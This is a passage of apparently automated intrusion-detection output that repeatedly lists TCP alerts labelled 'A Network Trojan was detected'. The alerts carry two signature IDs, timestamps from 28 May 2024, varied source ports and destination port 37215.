            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.276211
            SID:2829579
            Source Port:37602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870322
            SID:2835222
            Source Port:46718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946622
            SID:2829579
            Source Port:47138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251937
            SID:2829579
            Source Port:36712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300182
            SID:2829579
            Source Port:34842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955911
            SID:2829579
            Source Port:39280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704469
            SID:2835222
            Source Port:51928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990673
            SID:2835222
            Source Port:57042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842696
            SID:2835222
            Source Port:50222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058518
            SID:2829579
            Source Port:35476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811135
            SID:2829579
            Source Port:49444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042549
            SID:2835222
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584177
            SID:2829579
            Source Port:42582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.432980
            SID:2835222
            Source Port:37776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746008
            SID:2829579
            Source Port:38636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918504
            SID:2829579
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618049
            SID:2835222
            Source Port:35242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999516
            SID:2835222
            Source Port:53460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940377
            SID:2829579
            Source Port:48492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826032
            SID:2829579
            Source Port:41764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847481
            SID:2829579
            Source Port:40108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064819
            SID:2829579
            Source Port:55950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870633
            SID:2829579
            Source Port:40210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767734
            SID:2829579
            Source Port:58114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510047
            SID:2829579
            Source Port:40480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574181
            SID:2835222
            Source Port:45514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436599
            SID:2829579
            Source Port:56762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773127
            SID:2829579
            Source Port:54210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.734058
            SID:2835222
            Source Port:52618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033178
            SID:2835222
            Source Port:53020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107116
            SID:2829579
            Source Port:48510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810036
            SID:2835222
            Source Port:59870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.557575
            SID:2829579
            Source Port:60048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910149
            SID:2835222
            Source Port:39122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073282
            SID:2835222
            Source Port:44750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714794
            SID:2829579
            Source Port:52072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432324
            SID:2835222
            Source Port:38090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777087
            SID:2835222
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065038
            SID:2835222
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796403
            SID:2829579
            Source Port:34096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917320
            SID:2835222
            Source Port:48802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870225
            SID:2835222
            Source Port:39654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302087
            SID:2829579
            Source Port:37212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381402
            SID:2835222
            Source Port:39766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872335
            SID:2835222
            Source Port:52466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875148
            SID:2829579
            Source Port:51208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561969
            SID:2835222
            Source Port:40248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934928
            SID:2829579
            Source Port:56724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330424
            SID:2835222
            Source Port:59178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870178
            SID:2829579
            Source Port:52774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.658576
            SID:2835222
            Source Port:44810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153019
            SID:2829579
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.125935
            SID:2829579
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076796
            SID:2829579
            Source Port:59046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615337
            SID:2835222
            Source Port:37010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046530
            SID:2829579
            Source Port:55970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059995
            SID:2835222
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065037
            SID:2835222
            Source Port:39726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.244216
            SID:2829579
            Source Port:48856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299451
            SID:2829579
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.390944
            SID:2829579
            Source Port:34340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756878
            SID:2829579
            Source Port:50934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924989
            SID:2835222
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707456
            SID:2835222
            Source Port:51946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434686
            SID:2829579
            Source Port:56230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837831
            SID:2835222
            Source Port:38010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918452
            SID:2835222
            Source Port:54476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790107
            SID:2835222
            Source Port:47880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543473
            SID:2835222
            Source Port:47642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893285
            SID:2829579
            Source Port:34328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562839
            SID:2835222
            Source Port:38674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849233
            SID:2835222
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597574
            SID:2835222
            Source Port:45204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992479
            SID:2835222
            Source Port:50908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850455
            SID:2829579
            Source Port:33766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851117
            SID:2835222
            Source Port:34544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769254
            SID:2835222
            Source Port:35122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782803
            SID:2829579
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829057
            SID:2835222
            Source Port:43110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597372
            SID:2835222
            Source Port:50502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837799
            SID:2835222
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542444
            SID:2835222
            Source Port:43648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641453
            SID:2829579
            Source Port:59140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869511
            SID:2835222
            Source Port:34300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989669
            SID:2835222
            Source Port:50562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540236
            SID:2835222
            Source Port:52636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805708
            SID:2835222
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392761
            SID:2829579
            Source Port:56432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.522733
            SID:2829579
            Source Port:38970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585610
            SID:2835222
            Source Port:35906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728692
            SID:2829579
            Source Port:44806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809655
            SID:2835222
            Source Port:51394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930845
            SID:2829579
            Source Port:59180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525710
            SID:2835222
            Source Port:44680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068271
            SID:2835222
            Source Port:49252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309564
            SID:2835222
            Source Port:60474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.744485
            SID:2829579
            Source Port:60556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575822
            SID:2829579
            Source Port:33662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879776
            SID:2829579
            Source Port:40400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057419
            SID:2835222
            Source Port:34144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778324
            SID:2835222
            Source Port:57968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714548
            SID:2835222
            Source Port:50102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078618
            SID:2835222
            Source Port:47992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485643
            SID:2835222
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341900
            SID:2835222
            Source Port:40650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646398
            SID:2835222
            Source Port:33328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943103
            SID:2829579
            Source Port:58000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804600
            SID:2829579
            Source Port:38164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760343
            SID:2835222
            Source Port:46134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470611
            SID:2829579
            Source Port:50886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486133
            SID:2829579
            Source Port:42544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767030
            SID:2829579
            Source Port:35400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837555
            SID:2829579
            Source Port:35960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.961471
            SID:2835222
            Source Port:47568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760123
            SID:2829579
            Source Port:38760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883147
            SID:2829579
            Source Port:44752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885262
            SID:2835222
            Source Port:36398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052892
            SID:2829579
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437187
            SID:2835222
            Source Port:60216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764718
            SID:2829579
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941753
            SID:2829579
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.938908
            SID:2829579
            Source Port:47242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880166
            SID:2835222
            Source Port:52270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582714
            SID:2835222
            Source Port:42276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862968
            SID:2829579
            Source Port:49898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956501
            SID:2835222
            Source Port:33748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014497
            SID:2829579
            Source Port:47486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944359
            SID:2835222
            Source Port:41784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552697
            SID:2835222
            Source Port:34914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696745
            SID:2835222
            Source Port:51210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893601
            SID:2829579
            Source Port:44448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.771801
            SID:2829579
            Source Port:46934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066135
            SID:2835222
            Source Port:51340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696772
            SID:2835222
            Source Port:42386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.972285
            SID:2829579
            Source Port:33032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740999
            SID:2835222
            Source Port:44008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.238290
            SID:2829579
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.712052
            SID:2829579
            Source Port:39012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290766
            SID:2835222
            Source Port:60360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309231
            SID:2835222
            Source Port:41420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918678
            SID:2835222
            Source Port:43218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052341
            SID:2835222
            Source Port:37214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900490
            SID:2829579
            Source Port:51048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.946106
            SID:2829579
            Source Port:59062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870230
            SID:2835222
            Source Port:35434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457561
            SID:2829579
            Source Port:51654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386198
            SID:2835222
            Source Port:50720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039313
            SID:2829579
            Source Port:42262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485221
            SID:2835222
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320815
            SID:2835222
            Source Port:42498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069774
            SID:2835222
            Source Port:37572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368309
            SID:2829579
            Source Port:58232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553243
            SID:2835222
            Source Port:46254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307639
            SID:2829579
            Source Port:34824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873306
            SID:2835222
            Source Port:43110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563296
            SID:2835222
            Source Port:56952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.861029
            SID:2829579
            Source Port:57408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.613078
            SID:2835222
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985490
            SID:2835222
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.325169
            SID:2835222
            Source Port:35624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701825
            SID:2829579
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919635
            SID:2835222
            Source Port:43950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989774
            SID:2829579
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939241
            SID:2835222
            Source Port:57526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368283
            SID:2835222
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928697
            SID:2829579
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966708
            SID:2835222
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.532466
            SID:2829579
            Source Port:36968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809338
            SID:2835222
            Source Port:43074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556938
            SID:2829579
            Source Port:52114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.384734
            SID:2835222
            Source Port:42360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574275
            SID:2829579
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825094
            SID:2829579
            Source Port:35662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989755
            SID:2835222
            Source Port:38446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.115369
            SID:2835222
            Source Port:38320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.760378
            SID:2829579
            Source Port:35168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953613
            SID:2829579
            Source Port:54814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836627
            SID:2835222
            Source Port:37128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977621
            SID:2829579
            Source Port:37686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896511
            SID:2835222
            Source Port:60990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919083
            SID:2829579
            Source Port:37730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556954
            SID:2835222
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753143
            SID:2835222
            Source Port:53478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945327
            SID:2835222
            Source Port:54458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.934260
            SID:2835222
            Source Port:32984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071295
            SID:2835222
            Source Port:39968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925264
            SID:2835222
            Source Port:51586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995212
            SID:2829579
            Source Port:52222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979536
            SID:2835222
            Source Port:48634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772479
            SID:2835222
            Source Port:35686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052196
            SID:2829579
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777392
            SID:2829579
            Source Port:40888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847719
            SID:2829579
            Source Port:43226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.621602
            SID:2835222
            Source Port:43224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759532
            SID:2829579
            Source Port:60702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299874
            SID:2829579
            Source Port:56986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778801
            SID:2835222
            Source Port:42384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
